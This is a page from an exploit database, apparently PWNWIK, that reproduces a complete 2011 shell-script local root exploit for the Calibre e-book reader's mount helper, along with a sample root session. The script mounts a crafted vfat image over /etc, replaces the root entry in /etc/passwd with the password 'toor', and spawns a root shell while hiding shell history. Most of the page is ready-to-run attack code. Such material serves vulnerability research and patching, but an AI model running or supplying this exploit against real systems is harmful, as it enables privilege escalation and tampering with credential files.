Loading
0

Calibre E-Book Reader 本地ROOT漏洞

免费、自由、人人可编辑的漏洞库

,

EXP

# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh

                  #######################################
                  #     .60-Calibrer Assault Mount      #
                  #              by zx2c4               #
                  #######################################

################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundumental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh
# + Making temporary directory: /tmp/tmp.OGgS0jaoD4
# + Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# + Mounting overlay image using calibre-mount-helper.
# + Copying /etc into overlay.
# + Tampering with overlay's passwd.
# + Unmounting overlay image using calibre-mount-helper.
# + Mounting overlay to /etc using calibre-mount-helper.
# + Asking for root. When prompted for a password, enter 'toor'.
# Password: typed in toor to the terminal
# + Unmounting /etc using root umount.
# + Cleaning up: /tmp/tmp.OGgS0jaoD4
# + Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################


echo "#######################################"
echo "#     .60-Calibrer Assault Mount      #"
echo "#              by zx2c4               #"
echo "#######################################"
echo
echo -n "+ Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "+ Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "+ Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "+ Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "+ Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "+ Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "+ Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc  >/dev/null 2>&1
cd /
echo "+ Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"+ Unmounting /etc using root umount.\"; umount /etc; echo \"+ Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"+ Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

PWNWIK.COM